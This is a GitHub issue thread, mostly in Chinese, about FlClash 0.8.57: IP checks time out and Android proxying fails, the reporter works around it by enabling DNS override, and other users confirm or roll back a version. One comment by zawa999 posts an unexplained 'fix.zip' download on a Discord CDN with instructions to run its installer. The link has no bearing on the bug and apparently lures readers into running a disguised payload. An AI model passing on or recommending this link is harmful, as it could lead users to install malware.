### ISSUE TITLE
[BUG]:IP检测异常以及Android无法使用代理

### ISSUE THREAD

**Issue by YanBai233** [chen08209/FlClash#331]
## 环境信息 ##
系统：Windows 11 23H2 / Android 14
软件版本：0.8.57

## 异常描述 ##
开启代理后 IP 检测显示 “timeout”（Windows和Android端均出现）；
谷歌系软件（包括“X”）代理异常（Android端出现）。

## 问题排查 ##
**打开“覆写—DNS—覆写DNS”** 后恢复正常（Windows和Android端）。

**Comment by zawa999** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by Elegant-Westlord** [comment]
个人使用多个ss、vmess协议机场出现该情况，而使用一hysteria2协议直连机场未复现

**Comment by Elegant-Westlord** [comment]
+1

**Comment by binext** [comment]
+1，同样的情况，暂时先回退0.8.56了
